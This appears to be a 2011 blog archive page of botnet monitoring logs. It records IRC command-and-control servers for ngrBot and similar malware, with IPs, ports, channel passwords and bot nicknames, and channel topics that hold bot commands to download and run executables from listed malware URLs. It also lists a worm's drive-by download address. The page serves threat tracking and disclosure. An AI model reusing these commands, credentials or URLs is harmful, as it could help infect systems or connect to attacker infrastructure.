Month: June 2011

77.79.7.246 (ngrBot hosted in Lithuania Splius Uab)

DNS Lookup
Host Name IP Address
api.wipmania.com api.wipmania.com 213.251.170.52 fullyundetectable.com
UDP Connections
Download URLs
http://213.251.170.52/ (api.wipmania.com)
Outgoing connection to remote server: api.wipmania.com TCP port 80
C&C Server: 77.79.7.246:1863
Server Password:
Username: iogjzhd
Nickname: n{DE|XPa}iogjzhd
Channel: #ngr (Password: ngrbot)
Channeltopic: :.s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg
Now talking in #ngr
Topic On: [ #ngr ...

xvm-9-86.ghst.net (ngrBot hosted in France Gandi)

Remote Host Port Number
213.251.170.52 80
92.243.18.207 80
92.243.18.207 3212 PASS ngrBot
92.243.18.207 4949 PASS ngrBot
92.243.9.86 3211 PASS ngrBot
92.243.9.86 3333 PASS ngrBot
Now talking in #nazel
Topic On: [ #nazel] [ !NAZEL http://vjestice.fileave.com/46cc323cfb4d5be72a3969dff8338cdf.exe 46CC323CFB4D5BE72A3969DFF8338CDF !NAZEL http://mediahostdata.org/install.52161.exe -r !j -c US,USA,GBR,GB,AUS,AU,CA #ppi ]
Topic By: [ DD ]
Parts: DD [Mr_DD@HeavenOnEarth]
Now talking in ...

yesim.hoodrich.ru (irc botnet hosted in United States South Lake Tahoe Reliablehosting.com – Network Services)

Remote Host Port Number
yesim.hoodrich.ru:4042
Resolved : [yesim.hoodrich.ru] To [216.131.127.13]
216.131.127.13 4042
89.201.164.126 80
NICK new[USA|XP|COMPUTERNAME]pethrmn
USER xD "" "lol" :xD
JOIN #biznew#
PONG 422
PONG :irc.priv8net4.com
C&C Server: 64.69.44.51:4042
Server Password:
Username: hh
Nickname: new[DEU|XP|DELL-D3E62F7E26]tmlnhjx
Channel: #biznew# (Password: )
Channeltopic: :!down /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/57/38/42/59/51/59/52/20/52/54/38/67/114/97/97/40/105/109/102/
* The data identified by the following URL was then requested from ...

91.211.117.46 (ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)

Remote Host Port Number
213.251.170.52 80
91.211.117.81 80
91.211.117.46 1865 PASS ngrBot
NICK n{US|XPa}ruzgvfp
USER ruzgvfp 0 0 :ruzgvfp
JOIN #main 4m3r1k4
QUIT :rebooting
Now talking in #main
Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ]
Topic By: [ RamzGallagher ]
hosting infos: http://whois.domaintools.com/91.211.117.46

Worm.Win32.FFAuto.uy

Exe file: http://123back.com/1.EXE
Java drive by: http://123back.com/
* The following Host Names were requested from a host database:
  o sam.chatsmate.com
  o ms.tvchatz.com
  o chatsmate.com
  o justchatz.com
  o tvchatz.com
sam.chatsmate.com ms.tvchatz.com chatsmate.com justchatz.com
UDP Connections
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: ...

193.106.172.131 (ngrBot hosted in Russian Federation Moscow Iqhost Ltd)

Remote Host Port Number
193.106.172.131 1863 PASS ngrBot
213.251.170.52 80
NICK n{US|XPa}hvjyted
USER hvjyted 0 0 :hvjyted
JOIN #80t35ref 1963.g3rb3rs1t0.3691
UPDATE:
NICK n{US|XPa}llwonwe
USER llwonwe 0 0 :llwonwe
JOIN #80t35ref 1963.g3rb3rs1t0.3691
Now talking in #80t35ref
Topic On: [ #80t35ref ] [ *pu http://vector7.net/pOUI712yd.exe 0bba6a00254d8eec745e831e1e90d75d ]
Topic By: [ cholo ]
hosting infos: http://whois.domaintools.com/193.106.172.131